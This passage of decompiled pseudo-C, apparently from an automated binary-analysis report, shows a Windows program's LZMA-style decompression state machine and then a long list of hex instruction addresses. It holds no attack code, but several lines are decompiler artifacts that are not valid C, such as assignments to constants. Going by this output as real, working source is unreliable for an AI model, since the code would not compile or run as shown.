								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                      0x00000000
                      0x0040604c
                      0x0040604c
                      0x00406051
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00406709
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x00000000
                      0x0040672b
                      0x00406053
                      0x00406053
                      0x00406057
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062e1
                      0x004062e4
                      0x00406287
                      0x0040628d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004062e6
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00000000
                      0x00406284
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406190
                      0x00406193
                      0x0040610a
                      0x0040610a
                      0x00406110
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x0040621d
                      0x00406220
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c0
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x004063f7
